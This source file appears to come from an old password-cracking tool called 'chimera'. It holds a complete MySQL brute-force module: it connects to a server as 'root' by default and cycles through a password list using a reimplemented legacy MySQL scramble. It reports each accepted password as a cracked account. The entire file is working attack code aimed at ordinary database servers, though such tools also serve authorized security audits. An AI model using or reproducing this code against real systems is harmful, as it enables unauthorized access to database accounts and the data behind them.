/***************************************************************************
 *  service-mysql.cc : This file is part of 'chimera'
 *
 *  (c) 2004 by Lukasz Tomicki <tomicki@o2.pl>
 *  partial (c) www.mysql.com
 *  partial (c) mcbethh(at)u-n-f(dot)com
 *
 ****************************************************************************/

/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU Library General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 */			

#include "CServiceAttack.h"

using namespace std;

int CServiceAttack::service_mysql(thread_data *pData)
{	
	if (!pData->user)
		pData->user = alloc_copy("root");
	
	SOCKET sock = init_connection(pData);
	bool passwd_used(1);
	char buffer1[128];
	char salt[9];
	while (pData->state == WORKING) {
		if (!sock) {
			sock = init_connection(pData);
			continue;
		}
		
		if (!mysql_init(sock, salt, pData)) {
			adjust_connections(pData);
			mysql_send_com_quit(sock, pData);
			close(sock);
			sock = 0;
			continue;
		}
		
		if (passwd_used) {
			pthread_mutex_t passwd_mutex = PTHREAD_MUTEX_INITIALIZER;
			pthread_mutex_lock(&passwd_mutex);
			const char *passwd_name = get_next_passwd(pData);
	
			if (!passwd_name) {
				pData->state = DONE;
				pthread_mutex_unlock(&passwd_mutex);
				continue;
			}
			
			strncpy(buffer1, passwd_name, 128);
			pthread_mutex_unlock(&passwd_mutex);
			passwd_used = 0;
		}
		
		passwd_used = true;
		unsigned long response_len;
		char *response = mysql_prepare_auth(pData->user, buffer1, salt);
		output(MSG_VERBOSE, "trying passwd %s\n", buffer1);
	
		if (!response) {
			mysql_send_com_quit(sock, pData);
			close(sock);
			sock = 0;
			continue;
		}
		
		response_len = *((unsigned long *) response) & 0xffffff;
		
		sendAll(sock, pData->ssl, response, response_len + 4, 0, std_timeout);
		//output(MSG_DEBUG, "sendAll(sock, pData->ssl, response, response_len + 4, 0, std_timeout);\n");
		free(response);
		
		char buffer2[256];
		if (!recvAll(sock, pData->ssl, buffer2, 256, 0, std_timeout)) {
			//output(MSG_DEBUG, "recvAll failed\n");
			adjust_connections(pData);
			close(sock);
			sock = 0;
			continue;
		}
		
		bool res = mysql_parse_response((unsigned char *) buffer2);
		
		if (!res)
			account_cracked(pData, buffer1);
  
		mysql_send_com_quit(sock, pData);
		close(sock);
		sock = 0;
	}
	close(sock);
	return 0;
}

bool CServiceAttack::mysql_init(int sock, char *salt, thread_data *pData)
{
	char *server_version;
	u8 protocol;
	char buffer[256];

	if (!recvAll(sock, pData->ssl, buffer, 256, 0, std_timeout))
		return false;
	
	protocol = buffer[4];
	
	if (protocol == 0xff) {
    	output(MSG_ERROR, "mysql protocol error\n");
    	return false;
  	}
  	if (protocol < 10) {
    	output(MSG_ERROR, "mysql protocol error\n");
    	return false;
  	}
	
  	server_version = &buffer[5];
  	void *pos = buffer + strlen(server_version) + 10;
  	memcpy(salt, pos, 9);

  	if (!strstr(server_version, "3.") && !strstr(server_version, "4.")) {
    	output(MSG_ERROR, "not an mysql protocol or unsupported version\n");
		return false;
	}

  	return true;
}

char *CServiceAttack::mysql_prepare_auth(const char *login, const char *pass, char *salt)
{
	u8 *response;
	unsigned long login_len = strlen(login) > 32 ? 32 : strlen(login);
	unsigned long response_len = 4 /* header */  +
    2 /* client flags */  +
    3 /* max packet len */  +
    login_len + 1 + 8 /* scrambled password len */ ;

	response = (unsigned char *) malloc(response_len + 4);
	
	if (!response)
		return 0;

	memset(response, 0, response_len + 4);

	*((unsigned long *) response) = response_len - 4;
	response[3] = 0x01;           /* packet number */
	response[4] = 0x85;
	response[5] = 0x24;           /* client flags */
	response[6] = response[7] = response[8] = 0x00;       /* max packet */
	memcpy(&response[9], login, login_len);       /* login */
	response[9 + login_len] = 0;       /* null terminate login */
	mysql_scramble((char *) &response[9 + login_len + 1], salt, pass);

	return ( (char *) response );
}

bool CServiceAttack::mysql_parse_response(u8 *response)
{
	unsigned long response_len = *((unsigned long *) response) & 0xffffff;

	if (response_len < 4)
		return false;

	if (response[4] == 0xff)
		return true;

	return false;
}

void CServiceAttack::mysql_send_com_quit(int sock, thread_data *p)
{
	char com_quit_packet[5] = { 0x01, 0x00, 0x00, 0x00, 0x01 };
	sendAll(sock, p->ssl, com_quit_packet, 5);
}

void CServiceAttack::mysql_randominit(mysql_rand_struct *rand_st, unsigned long seed1,
unsigned long seed2)
{                           
	rand_st->max_value = 0x3FFFFFFFL;
	rand_st->max_value_dbl = (double) rand_st->max_value;
	rand_st->seed1 = seed1 % rand_st->max_value;
	rand_st->seed2 = seed2 % rand_st->max_value;
}

double CServiceAttack::mysql_rnd(mysql_rand_struct *rand_st)
{
  rand_st->seed1 = (rand_st->seed1 * 3 + rand_st->seed2) % rand_st->max_value;
  rand_st->seed2 = (rand_st->seed1 + rand_st->seed2 + 33) % rand_st->max_value;
  return ( ((double) rand_st->seed1) / rand_st->max_value_dbl );
}

void CServiceAttack::mysql_hash_password(unsigned long *result, const char *password)
{
	register unsigned long nr = 1345345333L, add = 7, nr2 = 0x12345671L;
	unsigned long tmp;
	for (; *password; ++password) {
		if (*password == ' ' || *password == '\t')
			continue;
		
		tmp = (unsigned long) (unsigned char) *password;
		nr ^= (((nr & 63) + add) * tmp) + (nr << 8);
		nr2 += (nr2 << 8) ^ nr;
		add += tmp;
	}
	
	result[0] = nr & (((unsigned long) 1L << 31) - 1L);
	result[1] = nr2 & (((unsigned long) 1L << 31) - 1L);
}

const char *CServiceAttack::mysql_scramble(char *to, const char *message, 
const char *password)
{
	mysql_rand_struct rand_st;
	unsigned long hash_pass[2], hash_message[2];
	char extra;
	
	if (password && password[0]) {
    	char *to_start = to;

    	mysql_hash_password(hash_pass, password);
    	mysql_hash_password(hash_message, message);
    	mysql_randominit(&rand_st, hash_pass[0] ^ hash_message[0], 
			hash_pass[1] ^ hash_message[1]);
		while (*message++)
			*to++ = (char) (floor(mysql_rnd(&rand_st) * 31) + 64);
    
		extra = (char) (floor(mysql_rnd(&rand_st) * 31));
		
    	while (to_start != to)
      		*(to_start++) ^= extra;
  }
  *to = 0;
  
  return ( to );
}
